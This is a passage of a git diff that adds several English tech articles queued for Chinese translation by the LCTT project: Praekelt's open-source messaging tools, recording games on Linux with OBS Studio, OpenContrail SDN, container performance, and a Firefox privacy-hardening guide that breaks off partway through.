+[13]:https://github.com/cozy-labs/cozy-desktop +[14]:https://www.google.com/chrome/ +[15]:https://github.com/pwnall/dropship-chrome +[16]:https://en.wikipedia.org/wiki/CardDAV +[17]:https://en.wikipedia.org/wiki/CalDAV +[18]:https://opensource.com/user/36051/feed +[19]:https://opensource.com/article/17/2/cozy-personal-cloud#comments +[20]:https://opensource.com/users/druthb diff --git a/sources/tech/20170201 Dedicated engineering team in South Africa deploys open source tools save lives.md b/sources/tech/20170201 Dedicated engineering team in South Africa deploys open source tools save lives.md new file mode 100644 index 0000000000..4745fa66bd --- /dev/null +++ b/sources/tech/20170201 Dedicated engineering team in South Africa deploys open source tools save lives.md @@ -0,0 +1,83 @@ +Dedicated engineering team in South Africa deploys open source tools, save lives +============================================================ + + ![Dedicated engineering team in South Africa deploys open source tools, save lives](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/world_hands_diversity.png?itok=LMT5xbxJ "Dedicated engineering team in South Africa deploys open source tools, save lives") +Image by : opensource.com + +In 2006, a groundbreaking TED talk used statistics to reveal surprising [insights about the developing world][2], including how many people in South Africa have HIV despite free and available anti-retroviral drugs. + +[Gustav Praekelt][3], founder of [Praekelt.org][4], heard this TED talk and began tenaciously calling a local hospital to convince them to start an SMS program that would promote anti-retrovirals. The program that resulted from those calls became [txtAlert][5]—a successful and widely recognized mobile health program that dramatically improves medical appointment adherence and creates a free channel for patients to communicate with the hospital.  + +Today, nearly a decade later, the organization that Gustav founded in 2007, Praekelt.org, continues to harness the power of mobile technology. + +The global nonprofit organization uses open source technologies to deliver essential information and vital services to millions of people around the world, particularly in Africa. We are deeply committed to the idea that our software innovations should be shared with the development community that made delivering our products possible. By participating and giving back to this community we support and sustain the rich ecosystem of tools and products that they have developed to improve the lives of people around the world. + +Praekelt.org is a supporter of the [Principles for Digital Development][6] and in particular [Cause 6][7], which states: + +* Adopt and expand existing open standards. +* Open data and functionalities and expose them in documented Application Programming Interfaces (APIs) where use by a larger community is possible. +* Invest in software as a public good. +* Develop software to be open source by default with the code made available in public repositories and supported through developer communities. + +A great example of this can be found in our original work to make population-scale messaging possible in the majority world. We had and continue to have success with txtAlert in South Africa, but despite considerable interest, replicating this success in other places has been very challenging. The necessary integration work required for each new messaging service provider requires too much customization. + +To solve this, we created [Vumi][8], a software library that provides a single point of integration for messaging communication channel integrations. It abstracts away all of the differences that require the customized integrations and provided a single consistent API to speak to all of them. The result is a dramatic increase in the re-use of both integrations and applications because they were only needing to be written once and could be used widely. + +Vumi provides the means of integrations, and this past year in collaboration with UNICEF we have launched [Junebug][9], an application server that provides APIs to launch Vumi integrations, enabling direct messaging system integrations in both cloud- and on-premise-based scenarios. Junebug now powers national-scale, maternal health programs in South Africa, Nigeria, and Uganda, delivering essential information for expecting women and mothers. It also provides SMS and [Unstructured Supplementary Service Data][10] (USSD) access to vital services, such as national helpdesks and FAQ services. + +These systems have processed over 375 million real-time messages in the last year. + +We are a relatively small engineering team based out of South Africa. We could not fathom developing these services were we not standing on the shoulders of giants. All of the services we provide or build on are available as open source software. + +Our language of choice is [Python][11], which enables us to express our ideas in code succinctly and in a way that is both readable and maintainable. Our messaging systems are built using [Twisted][12], an excellent event-driven network programming framework built using Python. [Molo][13], our web publishing platform, is built using [Django][14], and the wonderful open source [Wagtail CMS][15] is built by our friends at [Torchbox][16]. + +Our three-person site reliability engineering team is able to run over a thousand applications in production by relying on Mesosphere's [Marathon][17] for [Apache Mesos][18]. We have recently released [Marathon Acme][19], which enables automatic SSL/TLS certificate provisioning via [LetsEncrypt][20] for Marathon's load balancer, ensuring our services are secure. + +Our engineering team is distributed, and the workflow enabled by [Git][21] allows us to develop software in a reliable fashion. For example, by using test-driven development we are able to automate our deploys. Using these open source tools and systems we've averaged 21 automated deploys a day over the course of 2016. Developing software in an open environment is easier and more effective. Our work would have been significantly more difficult had there not been such an active and vibrant community on which to build. + +We are excited to be part of these developments in open source technology integration. As a mission-driven organization we are deeply committed to continue [sharing ][22][what we learn][23] and develop. If you are interested in joining our team, [apply here][24]. Our open source repositories have documented OS licenses and contributions guidelines. We welcome any community contributions. Please email us at [dev@praekelt.org][25]. + +-------------------------------------------------------------------------------- + +作者简介: + +Simon de Haan - Simon de Haan is the Chief Engineer at Praekelt Foundation and has the rare talent to demystify software systems and platforms for non­​engineers. He was the team lead on Praekelt Foundation’s Vumi platform, an open source messaging platform that allows for interactive conversations over SMS, USSD, Gt​alk and other basic technologies at low cost and at population scale in the majority world. Vumi is the technology that powers various groundbreaking initiatives such as Wikipedia Text, PeaceTXT, + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/open-source-tools-south-africa + +作者:[Simon de Haan][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/praekelt +[1]:https://opensource.com/article/17/2/open-source-tools-south-africa?rate=XZZ1Mtc79KokPszccwi_HiEkWMJyoJZghkUumJTwIiI +[2]:https://www.ted.com/talks/hans_rosling_shows_the_best_stats_you_ve_ever_seen +[3]:http://www.praekelt.org/ +[4]:http://www.praekelt.org/ +[5]:http://txtalert.praekeltfoundation.org/bookings/about-txtalert/ +[6]:http://digitalprinciples.org/ +[7]:http://digitalprinciples.org/use-open-standards-open-data-open-source-and-open-innovation/ +[8]:https://github.com/praekelt/vumi +[9]:http://junebug.praekelt.org/ +[10]:https://en.wikipedia.org/wiki/Unstructured_Supplementary_Service_Data +[11]:https://www.python.org/ +[12]:https://en.wikipedia.org/wiki/Twisted_(software) +[13]:http://molo.readthedocs.io/ +[14]:http://www.djangoproject.com/ +[15]:https://wagtail.io/ +[16]:https://torchbox.com/work/wagtail/ +[17]:https://mesosphere.github.io/marathon/ +[18]:http://mesos.apache.org/ +[19]:https://github.com/praekeltfoundation/marathon-acme +[20]:https://letsencrypt.org/ +[21]:http://git-scm.org/ +[22]:https://medium.com/@praekeltorg +[23]:https://medium.com/@praekeltorg +[24]:http://www.praekelt.org/careers/ +[25]:https://opensource.com/article/17/2/mail%20to:%20dev@praekelt.org +[26]:https://opensource.com/user/108011/feed +[27]:https://opensource.com/users/praekelt diff --git a/sources/tech/20170201 How to capture and stream your gaming session on Linux.md b/sources/tech/20170201 How to capture and stream your gaming session on Linux.md new file mode 100644 index 0000000000..8d1e9ce350 --- /dev/null +++ b/sources/tech/20170201 How to capture and stream your gaming session on Linux.md @@ -0,0 +1,108 @@ +How to capture and stream your gaming session on Linux +============================================================ + +### On this page + +1. [Capture settings][1] +2. [Setting up the sources][2] +3. [Transitioning][3] +4. [Conclusion][4] + +There may not be many hardcore gamers who use Linux, but there certainly are quite a lot Linux users who like to play a game now and then. If you are one of them and would like to show the world that Linux gaming isn’t a joke anymore, then you will find the following quick tutorial on how to capture and/or stream your gaming session interesting. The software tool that I will be using for this purpose is called “[Open Broadcaster Software Studio][5]” and it is maybe the best of the kind that we have at our disposal. + +### Capture settings + +Through the top panel menu, we choose File → Settings and then we select the “Output” to set our preferences for the file that is to be produced. Here we can set the audio and video bitrate that we want, the destination path for the newly created file, and the file format. A rough setting for the quality is also available on this screen. + +[ + ![Select output set in OBS Studio](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_1.png) +][6] + +If we change the output mode on the top from “Simple” to “Advanced” we will be able to set the CPU usage load that we allow OBS to induce to our system. Depending on the selected quality, the CPU capabilities, and the game that we are capturing, there’s a CPU load setting that won’t cause the frames to drop. You may have to do some trial to find that optimal setting, but if the quality is set to low you shouldn’t worry about it. + +[ + ![Change OBS output mode](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_2.png) +][7] + +Next, we go to the “Video” section of the settings where we can set the output video resolution that we want. Pay attention to the down-scaling filtering method as it makes all the difference in regards to the quality of the end result. + +[ + ![Down scaling filter](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_3.png) +][8] + +You may also want to bind hotkeys for the starting, pausing, and stopping of a recording. This is especially useful since you will be seeing your game’s screen while recording. To do this, choose the “Hotkeys” section in the settings and assign the keys that you want in the corresponding boxes. Of course, you don’t have to fill out every box, only the ones you need. + +[ + ![Configure Hotkeys in OBS](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_4.png) +][9] + +If you are interested in streaming and not just recording, then select the “Stream” category of settings and then you may select the streaming service among the 30 that are supported including Twitch, Facebook Live and Youtube, and then select a server and enter a stream key. + +[ + ![Streaming settings](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_5.png) +][10] + +### Setting up the sources + +On the lower left, you will find a box entitled as “Sources”. There we press the plus sign button to add a new source that is essentially our recording media source. Here you can set audio and video sources, but images and even text as well. + +[ + ![OBS Media Source](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_6.png) +][11] + +The first three concern audio sources, the next two images, the JACK option is for live audio capturing from an instrument, the Media Source is for the addition of a file, etc. What we are interested in for our purpose are the “Screen Capture (XSHM)”, the “Video Capture Device (V4L2)”, and the “Window Capture (Xcomposite) options. + +The screen capture option let’s you select the screen that you want to capture (including the active one), so everything is recorded. Workspace changes, window minimizations, etc. It is a suitable option for a standard bulk recording that will get edited before getting released. + +Let’s explore the other two. The Window Capture will let us select one of our active windows and put it into the capturing monitor. The Video Capture Device is useful in order to put our face right there on a corner so people can see us while we’re talking. Of course, each added source offers a set of options that we can fiddle with in order to achieve the result that we are after. + +[ + ![OBS Window Capture](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_7.png) +][12] + +The added sources are re-sizable and also movable along the plane of the recording frame, so you may add multiple sources, arrange them as you like, and finally perform basic editing tasks by right-clicking on them. + +[ + ![Add Multiple sources](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_8.png) +][13] + +### Transitioning + +Finally, let’s suppose that you are streaming your gaming session and you want to be able to rotate between the game view and yourself (or any other source). To do this, change to “Studio Mode” from the lower right and add a second scene with assigned another source assigned to it. You may also rotate between sources by unchecking the “Duplicate scene” and checking the “Duplicate sources” on the gear icon next to the “Transitions”. This is helpful for when you want to show your face only for short commentary, etc. + +[ + ![Studio mode](https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/pic_9.png) +][14] + +There are many transition effects available in this software and you may add more by pressing the plus sign icon next to “Quick Transitions” in the center. As you add them, you will also be prompt to set them. + +### Conclusion + +The OBS Studio software is a powerful piece of free software that works stably, is fairly simple and straightforward to use, and has a growing set of [additional plugins][15] that extend its functionality. If you need to record and/or stream your gaming session on Linux, I can’t think of a better solution other than using OBS. What is your experience with this or other similar tools? Share in the comments and feel free to also include a video link that showcases your skills. :) + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/ + +作者:[Bill Toulas ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/ +[1]:https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/#capture-settings +[2]:https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/#setting-up-the-sources +[3]:https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/#transitioning +[4]:https://www.howtoforge.com/tutorial/how-to-capture-and-stream-your-gaming-session-on-linux/#conclusion +[5]:https://obsproject.com/download +[6]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_1.png +[7]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_2.png +[8]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_3.png +[9]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_4.png +[10]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_5.png +[11]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_6.png +[12]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_7.png +[13]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_8.png +[14]:https://www.howtoforge.com/images/how-to-capture-and-stream-your-gaming-session-on-linux/big/pic_9.png +[15]:https://obsproject.com/forum/resources/categories/obs-studio-plugins.6/ diff --git a/sources/tech/20170201 OpenContrail An Essential Tool in the OpenStack Ecosystem.md b/sources/tech/20170201 OpenContrail An Essential Tool in the OpenStack Ecosystem.md new file mode 100644 index 0000000000..b1fd409f9f --- /dev/null +++ b/sources/tech/20170201 OpenContrail An Essential Tool in the OpenStack Ecosystem.md @@ -0,0 +1,54 @@ +OpenContrail: An Essential Tool in the OpenStack Ecosystem +============================================================ + + + ![OpenContrail](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/contrails-cloud.jpg?itok=aoNIH-ar "OpenContrail") +OpenContrail, an SDN platform used with the OpenStack cloud computing platform, is emerging as an essential tool around which administrators will need to develop skillsets.[Creative Commons Zero][1]Pixabay + +Throughout 2016, software-defined networking (SDN) rapidly evolved, and numerous players in the open source and cloud computing arenas are now helping it gain momentum. In conjunction with that trend,[ OpenContrail][3], a popular SDN platform used with the OpenStack cloud computing platform, is emerging as an essential tool around which many administrators will have to develop skillsets. + +Just as administrators and developers have ramped up their skillsets surrounding essential tools like Ceph in the OpenStack ecosystem, they will need to embrace OpenContrail, which is fully open source and stewarded by the Apache Software Foundation. + +With all of this in mind, Mirantis, one of the most active companies on the OpenStack scene, has[ announced][4] commercial support for and contributions to OpenContrail. "With the addition of OpenContrail, Mirantis becomes a one-stop support shop for the entire stack of popular open source technologies used in conjunction with OpenStack, including Ceph for storage, OpenStack/KVM for compute and OpenContrail or Neutron for SDN," the company noted. + +According to a Mirantis announcement, "OpenContrail is an Apache 2.0-licensed project that is built using standards-based protocols and provides all the necessary components for network virtualization–SDN controller, virtual router, analytics engine, and published northbound APIs. It has an extensive REST API to configure and gather operational and analytics data from the system. Built for scale, OpenContrail can act as a fundamental network platform for cloud infrastructure." + +The news follows Mirantis’[ acquisition of TCP Cloud][5], a company specializing in managed services for OpenStack, OpenContrail, and Kubernetes. Mirantis will use TCP Cloud’s technology for continuous delivery of cloud infrastructure to manage the OpenContrail control plane, which will run in Docker containers. As a part of the effort, Mirantis has also been contributing to OpenContrail. + +Many contributors behind OpenContrail are working closely with Mirantis, and they have especially taken note of the support programs that Mirantis will offer. + +“OpenContrail is an essential project within the OpenStack community, and Mirantis is smart to containerize and commercially support it. The work our team is doing will make it easy to scale and update OpenContrail and perform seamless rolling upgrades alongside the rest of Mirantis OpenStack,” said Jakub Pavlik, Mirantis’ director of engineering and OpenContrail Advisory Board member. “Commercial support will also enable Mirantis to make the project compatible with a variety of switches, giving customers more choice in their hardware and software,” he said. + +In addition to commercial support for OpenContrail, we are very likely to see Mirantis serve up educational offerings for cloud administrators and developers who want to learn how to leverage it. Mirantis is already well-known for its[ OpenStack training][6] curriculum and has wrapped Ceph into its training. + +In 2016, the SDN category rapidly evolved, and it also became meaningful to many organizations with OpenStack deployments. IDC published [a study][7] of the SDN market recently and predicted a 53.9 percent CAGR from 2014 through 2020, at which point the market will be valued at $12.5 billion. In addition, the Technology Trends 2016 report ranked SDN as one of the best technology investments that organizations can make. + +"Cloud computing and the 3rd Platform have driven the need for SDN, which will represent a market worth more than $12.5 billion in 2020\. Not surprisingly, the value of SDN will accrue increasingly to network-virtualization software and to SDN applications, including virtualized network and security services. Large enterprises are now realizing the value of SDN in the datacenter, but ultimately, they will also recognize its applicability across the WAN to branch offices and to the campus network," said[ Rohit Mehra][8], Vice President of Network Infrastructure at IDC. + +Meanwhile, The Linux Foundation recently[ announced][9] the release of its 2016 report ["Guide to the Open Cloud: Current Trends and Open Source Projects."][10] This third annual report provides a comprehensive look at the state of open cloud computing, and includes a section on SDN. + +The Linux Foundation also offers [Software Defined Networking Fundamentals][11] (LFS265), a self-paced, online course on SDN, and functions as the steward of the[ Open Daylight][12] project, another important open source SDN platform that is quickly gaining momentum. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/event/open-networking-summit/2017/2/opencontrail-essential-tool-openstack-ecosystem + +作者:[SAM DEAN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/sam-dean +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/contrails-cloudjpg +[3]:https://www.globenewswire.com/Tracker?data=brZ3aJVRyVHeFOyzJ1Dl4DMY3CsSV7XcYkwRyOcrw4rDHplSItUqHxXtWfs18mLsa8_bPzeN2EgZXWcQU8vchg== +[4]:http://www.econotimes.com/Mirantis-Becomes-First-Vendor-to-Offer-Support-and-Managed-Services-for-OpenContrail-SDN-486228 +[5]:https://www.globenewswire.com/Tracker?data=Lv6LkvREFzGWgujrf1n6r_qmjSdu67-zdRAYt2itKQ6Fytomhfphuk5EbDNjNYtfgAsbnqI8H1dn_5kB5uOSmmSYY9XP2ibkrPw_wKi5JtnAyV43AjuR_epMmOUkZZ8QtFdkR33lTGDmN6O5B4xkwv7fENcDpm30nI2Og_YrYf0b4th8Yy4S47lKgITa7dz2bJpwpbCIzd7muk0BZ17vsEp0S3j4kQJnmYYYk5udOMA= +[6]:https://training.mirantis.com/ +[7]:https://www.idc.com/getdoc.jsp?containerId=prUS41005016 +[8]:http://www.idc.com/getdoc.jsp?containerId=PRF003513 +[9]:https://www.linux.com/blog/linux-foundation-issues-2016-guide-open-source-cloud-projects +[10]:http://ctt.marketwire.com/?release=11G120876-001&id=10172077&type=0&url=http%3A%2F%2Fgo.linuxfoundation.org%2Frd-open-cloud-report-2016-pr +[11]:https://training.linuxfoundation.org/linux-courses/system-administration-training/software-defined-networking-fundamentals +[12]:https://www.opendaylight.org/ diff --git a/sources/tech/20170201 Performance made easy with Linux containers.md b/sources/tech/20170201 Performance made easy with Linux containers.md new file mode 100644 index 0000000000..4a55487cc4 --- /dev/null +++ b/sources/tech/20170201 Performance made easy with Linux containers.md @@ -0,0 +1,68 @@ +Performance made easy with Linux containers +============================================================ + + ![Performance made easy with Linux containers](https://opensource.com/sites/default/files/styles/image-full-size/public/containers_scale_performance.jpg?itok=A9RwUOXA "Performance made easy with Linux containers") +Image credits : CC0 Public Domain + +Performance for an application determines how quickly your software can complete the intended task. It answers questions about the application, such as: + +* Response time under peak load +* Ease of use, supported functionality, and use cases compared to an alternative +* Operational costs (CPU usage, memory needs, data throughput, bandwidth, etc.) + +The value of this performance analysis extends beyond the estimation of the compute resources needed to serve the load or the number of application instances needed to meet the peak demand. Performance is clearly tied to the fundamentals of a successful business. It informs the overall user experience, including identifying what slows down customer-expected response times, improving customer stickiness by designing content delivery optimized to their bandwidth, choosing the best device, and ultimately helping enterprises grow their business. + +### The problem + +Of course, this is an oversimplification of the value of performance engineering for business services. To understand the challenges behind accomplishing what I've just described, let's make this real and just a little bit complicated. + + ![Cloud scale performance](https://opensource.com/sites/default/files/cloud_scale_performance.jpg "Cloud scale performance") + +Real-world applications are likely hosted on the cloud. An application could avail to very large (or conceptually infinite) amounts of compute resources. Its needs in terms of both hardware and software would be met via the cloud. The developers working on it would use the cloud-offered features for enabling faster coding and deployment. Cloud hosting doesn't come free, but the cost overhead is proportional to the resource needs of the application. + +Outside of Search as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and Load Balancing as a Service (LBaaS), which is when the cloud takes care of traffic management for this hosted app, a developer probably may also use one or more of these fast-growing cloud services: + +* Security as a Service (SECaaS), which meets security needs for software and the user +* Data as a Service (DaaS), which provides a user's data on demand for application +* Logging as a Service (LaaS), DaaS's close cousin, which provides analytic metrics on delivery and usage of logs +* Search as a Service (SaaS), which is for the analytics and big data needs of the app +* Network as a Service (NaaS), which is for sending and receiving data across public networks + +Cloud-powered services are also growing exponentially because they make writing complex apps easier for developers. In addition to the software complexity, the interplay of all these distributed components becomes more involved. The user base becomes more diverse. The list of requirements for the software becomes longer. The dependencies on other services becomes larger. Because of these factors, the flaws in this ecosystem can trigger a domino effect of performance problems. + +For example, assume you have a well-written application that follows secure coding practices, is designed to meet varying load requirements, and is thoroughly tested. Assume also that you have the infrastructure and analytics work in tandem to support the basic performance requirements. What does it take to build performance standards into the implementation, design, and architecture of your system? How can the software keep up with evolving market needs and emerging technologies? How do you measure the key parameters to tune a system for optimal performance as it ages? How can the system be made resilient and self-recovering? How can you identify any underlying performance problems faster and resolved them sooner? + +### Enter containers + +Software [containers][2] backed with the merits of [microservices][3] design, or Service-oriented Architecture (SoA), improves performance because a system comprising of smaller, self-sufficient code blocks is easier to code and has cleaner, well-defined dependencies on other system components. It is easier to test and problems, including those around resource utilization and memory over-consumption, are more easily identified than in a giant monolithic architecture. + +When scaling the system to serve increased load, the containerized applications replicate fast and easy. Security flaws are better isolated. Patches can be versioned independently and deployed fast. Performance monitoring is more targeted and the measurements are more reliable. You can also rewrite and "facelift" resource-intensive code pieces to meet evolving performance requirements. + +Containers start fast and stop fast. They enable efficient resource utilization and far better process isolation than Virtual Machines (VMs). Containers do not have idle memory and CPU overhead. They allow for multiple applications to share a machine without the loss of data or performance. Containers make applications portable, so developers can build and ship apps to any server running Linux that has support for container technology, without worrying about performance penalties. Containers live within their means and abide by the quotas (examples include storage, compute, and object count quotas) as imposed by their cluster manager, such as Cloud Foundry's Diego, [Kubernetes][4], Apache Mesos, and Docker Swarm. + +While containers show merit in performance, the coming wave of "serverless" computing, also known as Function as a Service (FaaS), is set to extend the benefits of containers. In the FaaS era, these ephemeral or short-lived containers will drive the benefits beyond application performance and translate directly to savings in overhead costs of hosting in the cloud. If the container does its job faster, then it lives for a shorter time, and the computation overload is purely on demand. + +-------------------------------------------------------------------------------- + +作者简介: + +Garima is a Engineering Manager at Red Hat focussed on OpenShift Container Platform. Prior to Red Hat, Garima helped fuel innovation at Akamai Technologies & MathWorks Inc. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/performance-container-world + +作者:[Garima][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/garimavsharma +[1]:https://opensource.com/article/17/2/performance-container-world?rate=RozKaIY39AZNxbayqFkUmtkkhoGdctOVuGOAJqVJII8 +[2]:https://opensource.com/resources/what-are-linux-containers +[3]:https://opensource.com/resources/what-are-microservices +[4]:https://opensource.com/resources/what-is-kubernetes +[5]:https://opensource.com/user/109286/feed +[6]:https://opensource.com/article/17/2/performance-container-world#comments +[7]:https://opensource.com/users/garimavsharma diff --git a/sources/tech/20170201 Protecting Your Privacy With Firefox on Linux.md b/sources/tech/20170201 Protecting Your Privacy With Firefox on Linux.md new file mode 100644 index 0000000000..9a7499709d --- /dev/null +++ b/sources/tech/20170201 Protecting Your Privacy With Firefox on Linux.md @@ -0,0 +1,201 @@ +translating by ypingcn + +### Protecting Your Privacy With Firefox on Linux + + +Contents + +* * [1. Introduction][12] + * [2. Firefox Settings][13] + * [2.1. Health Report][1] + * [2.2. Search][2] + * [2.3. Do Not Track][3] + * [2.4. Disable Pocket][4] + * [3. Add-ons][14] + * [3.1. HTTPS Everywhere][5] + * [3.2. Privacy Badger][6] + * [3.3. Ublock Origin][7] + * [3.4. NoScript][8] + * [3.5. Disconnect][9] + * [3.6. Random Agent Spoofer][10] + * [4. System Settings][15] + * [4.1. Private DNS][11] + * [5. Closing Thoughts][16] + +### Introduction + +Privacy and security are becoming increasingly important topics. Though it's impossible to be 100% secure, there are measures that you can take, especially on Linux, to help defend your online privacy and security when browsing the web.  + +Firefox is probably your best option when selecting a browser for these purposes. Google Chrome cannot be trusted. It's owned by Google, a company known for data collection, and it's closed source. Chromium may be okay, but can't be guaranteed. Only Firefox has maintained a degree of commitment to user rights. + +### Firefox Settings + + ![private browsing with firefox](https://linuxconfig.org/images/private-browsing-firefox-linux.jpg) +There are some settings in Firefox that you can set to better protect your privacy. These are readily available and help to control the data that you share when you browse. + +### Health Report + +The first thing that you can set to limit the amount of data being sent is the Firefox health report. Sure, the data is just being sent to Mozilla, but it's still transmitting data.  + +Open up the Firefox menu and click on "Preferences." Go to the "Advanced" tab on the side and click "Data Choices." There you can disable any data reporting. + +### Search + +By default, newer versions of Firefox use Yahoo as their search engine. Some distributions configure them to use Google instead. Either way isn't ideal. Firefox does have the option to use DuckDuckGo as the default instead.  + +
+ ![Use DuckDuckGo on Firefox](https://linuxconfig.org/images/ff-ddg.jpg) +
+ +To enable DuckDuckGo, open up the Firefox menu and click on "Preferences." Head over to "Search" on the side menu. Then, use the "Default Search Engine" drop down menu to select DuckDuckGo. + +### Do Not Track + +Do Not Track isn't perfect, but it does send a signal to sites telling them not to record your activity through analytics tools. Those sites may or may not comply, but it's still best to enable Do Not Track in case they do.  + +
+ ![Enable Do Not Track on Firefox](https://linuxconfig.org/images/ff-tracking.jpg) +
+ +Open the Firefox menu again. Click on "Preferences" then "Privacy." At the top of the page there is a "Tracking" section. In the line that reads, "You can also manage your Do Not Track settings," click the link. A pop-up will appear with a checkbox allowing you to enable Do Not Track. + +### Disable Pocket + +There is no evidence that Pocket is doing anything nefarious, but it may be a good idea to disable it anyway, since it does link to a proprietary application.  + +Disabling Pocket isn't too difficult, but you have to be careful that Pocket is the only thing that you mess with. To get to the configuration that you need, type `about:config` in Firefox's address bar.  + +The page will lode a table of settings. At the top of that table is a search bar. Search for "Pocket" there.  + +You will be taken to a new table containing the results. You are looking for a setting called, "extensions.pocket.enabled." When you find it, double click on it to switch it to "false." You can edit the other Pocket related settings there too. It's not necessary, though. Just be sure not to edit anything that's not directly related to the Pocket extension. + +
+ ![Disable Pocket on Firefox](https://linuxconfig.org/images/ff-pocket.jpg) +
+ +### Add-ons + +
+ ![Add-ons to help secure Firefox](https://linuxconfig.org/images/ff-addons.jpg) +
+ +The most effective ways to protect your privacy and security in Firefox come from add-ons. Firefox has a massive add-on library, and many of those add-ons are free and open source software. The add-ons highlighted in this guide are among the best for securing your browser. + +### HTTPS Everywhere + +The Electronic Frontier Foundation developed HTTPS Everywhere in response to the large number of sites not using SSL certificates and the tendency for many links to not use the `https://` prefix and sending users to unsecured version of sites. HTTPS Everywhere ensures that if an encrypted version of a site exists, it is used.  + +HTTPS Everywhere is available for Firefox through the Firefox Add-on Search here `https://addons.mozilla.org/en-us/firefox/addon/https-everywhere/` + +### Privacy Badger + +The Electronic Frontier Foundation is also behind Privacy Badger. Privacy Badger aims to pick up where Do Not Track leaves off by blocking unwanted tracking from websites. It is also available through the Firefox Add-on repository here `https://addons.mozilla.org/en-us/firefox/addon/privacy-badger17`. + +### Ublock Origin + +Now for one of the more commonly privacy add-ons, ad blocking. In this case, the ad-blocker of choice is uBlock Origin. uBlock Origin is a lighter weight ad blocker that doesn't make exceptions when it comes to which ads it blocks. uBlock Origin will generally block any ad, especially the more invasive ones. You can find uBlock Origin here `https://addons.mozilla.org/en-us/firefox/addon/ublock-origin/`. + +### NoScript + +Blocking JavaScript is a bit controversial. JavaScript powers so much of the web, yet it is also notorious for being a vehicle for privacy invasion and a myriad or attacks. NoScript is an excellent solution for dealing with JavaScript.  + +
+ ![Add sites to NoScript's whitelist](https://linuxconfig.org/images/ff-noscript.jpg) +
+ +NoScript is a JavaScript whitelist. It will block all JavaScript universally until a site is added to the whitelist. Adding a site can be done preemptively through the plugin's "Options" menu, or it can be done by clicking the NoScript icon while on the page.  + +
+ ![Add the site you're on to NoScript's Whitelist](https://linuxconfig.org/images/ff-noscript2.jpg) +
+ +NoScript is a available through the Firefox add-on repository `https://addons.mozilla.org/en-US/firefox/addon/noscript/`. If the page says that it is unsupported on your version of Firefox, click "Download Anyway." It's been tested and is working with Firefox 51. + +### Disconnect + +Disconnect does much the same thing as Privacy Badger. It just provides yet another barrier of protection. You can find it in the add-on repository `https://addons.mozilla.org/en-US/firefox/addon/disconnect/`. If the page says that your version of Firefox isn't supported, click "Download Anyway." It has been tested and is working with Firefox 51. + +### Random Agent Spoofer + +The Random Agent Spoofer can change the browser signature of Firefox to make it appear as though it is virtually any other browser on any other platform. Though it has many other applications, it also guards against browser fingerprinting.  + +Browser Fingerprinting is yet another way that sites can track users based on the browser and operating system they are using. Browser fingerprinting affects Linux users and users of other "alternative" operating systems more than Windows users because their browser signatures are more unique.  + +You can add the Random Agent Spoofer through the Firefox add-on repository `https://addons.mozilla.org/en-us/firefox/addon/random-agent-spoofer/`. Like some of the others, the page may say that it isn't compatible with the newest versions of Firefox, and again, that wouldn't be true.  + +
+ ![Using Random Agent Spoofer on Firefox](https://linuxconfig.org/images/ff-random-agent.jpg) +
